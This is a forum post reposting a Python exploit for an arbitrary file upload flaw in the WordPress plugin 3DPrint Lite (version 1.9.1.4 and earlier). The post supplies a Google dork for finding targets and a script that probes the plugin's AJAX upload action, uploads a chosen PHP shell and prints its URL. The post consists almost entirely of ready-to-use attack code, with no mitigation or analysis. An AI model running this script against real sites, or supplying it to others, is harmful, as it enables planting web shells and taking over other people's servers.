WordPress 3DPrint Lite 1.9.1.4 Shell Upload

#350
Topic created · 1 Posts · 9 Views
  • # Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
    # Google Dork: inurl:/wp-content/plugins/3dprint-lite/
    # Date: 22/09/2021
    # Exploit Author: spacehen
    # Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
    # Version: <= 1.9.1.4
    # Tested on: Ubuntu 20.04.1
    
    import os.path
    from os import path
    import json
    import requests;
    import sys
    
    def print\_banner():
     print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
     print("Author -> spacehen (www.github.com/spacehen)")
    
    def print\_usage():
     print("Usage: python3 exploit.py [target url] [php file]")
     print("Ex: python3 exploit.py https://example.com ./shell.php")
    
    def vuln\_check(uri):
     response = requests.get(uri)
     raw = response.text
     if ("jsonrpc" in raw):
     return True;
     else:
     return False;
    
    def main():
    
     print\_banner()
     if(len(sys.argv) != 3):
     print\_usage();
     sys.exit(1);
    
     base = sys.argv[1]
     file\_path = sys.argv[2]
    
     ajax\_action = 'p3dlite\_handle\_upload'
     admin = '/wp-admin/admin-ajax.php';
    
     uri = base + admin + '?action=' + ajax\_action ;
     check = vuln\_check(uri);
    
     if(check == False):
     print("(*) Target not vulnerable!");
     sys.exit(1)
    
     if( path.isfile(file\_path) == False):
     print("(*) Invalid file!")
     sys.exit(1)
    
     files = {'file' : open(file\_path)}
     print("Uploading Shell...");
     response = requests.post(uri, files=files)
     file\_name = path.basename(file\_path)
     if(file\_name in response.text):
     print("Shell Uploaded!")
     if(base[-1] != '/'):
     base += '/'
     print(base + "wp-content/uploads/p3d/" + file\_name);
     else:
     print("Shell Upload Failed")
     sys.exit(1)
    
    main();
     
    
    
Log in to reply